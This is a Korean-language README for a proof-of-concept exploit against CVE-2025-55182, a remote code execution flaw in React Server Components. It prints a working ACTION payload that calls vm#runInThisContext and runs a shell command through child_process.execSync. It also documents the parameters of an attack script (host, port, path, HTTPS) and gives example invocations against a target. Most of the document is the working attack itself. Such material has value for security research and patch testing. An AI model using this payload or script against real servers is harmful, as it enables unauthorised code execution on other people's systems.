
CVE-2025-55182에 대한 개념 증명 익스플로잇으로, 악의적인 ACTION 페이로드와 vm.runInThisContext 주입을 통해 React Server Components에서 원격 코드 실행을 시연합니다.
이 프로젝트는 CVE-2025-55182 - React Server Components (RSC) RCE Proof of Concept으로, 특정 조건에서 vm.runInThisContext와 악성 ACTION payload를 통해 원격 코드 실행을 유발할 수 있음을 시연합니다.
React Server Components의 ACTION payload는 특정 조건에서:
공격자는 다음과 같은 payload를 구성할 수 있습니다:
{
"$ACTION_REF_0": "",
"$ACTION_0:0": "{\"id\": \"vm#runInThisContext\", \"bound\": [\"global.process.mainModule.require('child_process').execSync('calc').toString()\"]}"
}
| 매개변수 | 필수 여부 | 기본값 | 설명 |
|---|---|---|---|
--host | 예 | 없음 | 대상 서버의 IP 또는 도메인. 예: 127.0.0.1, 192.168.1.10, example.com |
--port | 아니오 | 80 | 대상 HTTP 서비스 포트, 예: 3003 |
--path | 예 | 없음 | 취약점을 트리거할 수 있는 대상 라우트 경로, 예: /feedback, /action |
--https | 아니오 | False | HTTPS를 사용하여 payload 전송 여부 (기본 HTTP) |
python a.py --host <대상 IP> --port <포트> --path <대상 URL 경로>
python a.py --host 127.0.0.1 --port 3003 --path /feedback